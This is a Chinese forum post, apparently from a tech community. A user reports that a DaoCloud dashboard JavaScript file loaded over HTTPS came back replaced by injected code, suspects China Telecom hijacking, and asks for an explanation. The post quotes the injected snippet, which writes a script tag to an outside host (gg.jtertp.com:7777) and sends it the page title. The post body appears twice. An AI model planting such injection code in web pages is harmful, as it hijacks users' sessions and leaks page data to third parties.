今天访问 DaoCloud 的时候突然控制面板卡吃豆人了,仔细一看发现居然是因为加载了 HTTP 的资源被 Chrome 拦住了,打开控制台发现是这个 JS :
https://dn-daodashboard-prod.qbox.me/app/958e675a.app.js
正常情况应该是一大串,但是我得到的是:
document.write("<script language='javascript' src='http://dn-daodashboard-prod.qbox.me/app/958e675a.app.js?_vv=20080808'></script>");if(top.location==self.location){document.write("<script language='javascript' src='http://gg.jtertp.com:7777/rs/rs.php?src=p0005&t="+encodeURIComponent(document.title)+"&ci=140380449942919'></script>");}
搜了一下发现 gg.jtertp.com 似乎是电信的劫持?感觉真是好奇怪!电信居然已经可以进行 HTTPS 劫持了?!
求各路大神分析原因。。。
PS :证书应该没有问题,是 GeoTrust 的。
PSS :科学上网出国之后无此现象,不挂科学上网同网络环境下 3 台机器不同浏览器均出现这个现象
https://dn-daodashboard-prod.qbox.me/app/958e675a.app.js
正常情况应该是一大串,但是我得到的是:
document.write("<script language='javascript' src='http://dn-daodashboard-prod.qbox.me/app/958e675a.app.js?_vv=20080808'></script>");if(top.location==self.location){document.write("<script language='javascript' src='http://gg.jtertp.com:7777/rs/rs.php?src=p0005&t="+encodeURIComponent(document.title)+"&ci=140380449942919'></script>");}
搜了一下发现 gg.jtertp.com 似乎是电信的劫持?感觉真是好奇怪!电信居然已经可以进行 HTTPS 劫持了?!
求各路大神分析原因。。。
PS :证书应该没有问题,是 GeoTrust 的。
PSS :科学上网出国之后无此现象,不挂科学上网同网络环境下 3 台机器不同浏览器均出现这个现象
Select Language